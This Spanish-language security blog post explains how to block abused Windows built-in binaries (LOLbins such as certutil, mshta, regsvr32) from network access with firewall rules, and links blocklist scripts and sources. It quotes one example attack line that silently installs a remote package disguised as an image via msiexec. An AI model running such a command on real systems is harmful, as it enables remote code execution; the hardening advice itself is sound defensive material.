Bloquear LOLbins con el firewall de Windows

Hoy en día, muchos tipos de malware y troyanos de acceso remoto (RAT) y APTs utilizan archivos binarios integrados de Windows para preparar e infectar computadoras. Los programas comúnmente utilizados en este tipo de ataques son powershell.exe, regsvr32, rundll32, certreq.exe, certutil.exe y mshta.exe.

Los binarios de Living of the Land (LOLbins) evitan protecciones como AppLocker, ya que residen en la carpeta de Windows y/o están diseñados en código por Microsoft. Un ejemplo es:

msiexec /q /i http://192.168.100.3/tmp/cmd.png

En el proyecto LOLBAS se puede encontrar una excelente descripción general de cómo se puede "abusar" de los archivos binarios integrados para descargar o ejecutar código.

Para obtener más información sobre como estas herramientas son utilizadas por delincuentes y APTs, se puede consultar este artículo de Cynet.

Estos script de PowerShell crean nuevas reglas de firewall que bloquean el acceso a la red de LOLbin, archivos binarios legales del sistema operativo y comúnmente utilizados para llevar adelantes ataques.

En resumen, los scripts evitan que las utilidades integradas de Windows accedan a Internet. Por ejemplo, en la mayoría de las circunstancias, usar expand.exe para acceder a un archivo remoto es extremadamente improbable y definitivamente estaría mal visto si fuera necesario por razones legítimas.

Estas listas de bloqueo deben usarse con cuidado porque el sistema operativo podría verse afectado:

• https://gist.github.com/rc-MikeDevens/f991325ad51b398f8cf68eb63416977f
• https://github.com/eneerge/Powershell-Firewall-Block-LOLbins
• https://www.xf.is/wp-content/uploads/2022/12/block-lolbins-winfw.txt (mirror)
• https://github.com/atlantsecurity/windows-hardening-scripts/blob/main/windows-11-hardening-script

Sería mejor implementar herramientas como Attack Surface Reduction rules, Advanced Windows Defender features, Arbitary Code Guard, Exploit Protection, las cuales deberían utilizarse para brindar una mejor protección. Sin embargo, estas reglas se pueden utilizar en lugar de esas tecnologías para ofrecer cierta protección básica.

Créditos:

• https://lolbas-project.github.io/
• https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
• https://www.xf.is/2022/12/05/blocking-living-of-the-land-binaries-lolbins-with-windows-firewall/
• https://pentera.io/blog/the-lol-isnt-so-funny-when-it-bites-you-in-the-bas/
• https://www.cisecurity.org/insights/blog/living-off-the-land-threats-looming-from-within
• https://blog.talosintelligence.com/hunting-for-lolbins/
• https://woshub.com/windows-firewall-settings-group-policy/
• https://medium.com/@dimitrismargaritis/prevent-legitimate-windows-executables-to-be-used-to-gain-initial-foothold-in-your-infrastructure-39771cd6ec90
• https://www.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-fending-off-living-off-the-land-attacks/
• https://www.csnp.org/post/breaking-down-lolbas-attacks-with-the-help-of-hunter-gatherers
• https://github.com/mzfr/gtfo
• https://www.varonis.com/blog/living-off-the-land-lol-with-microsoft-part-ii-mshta-hta-and-ransomware
• https://www.cisecurity.org/insights/blog/living-off-the-land-threats-looming-from-within

Suscríbete a nuestro Boletín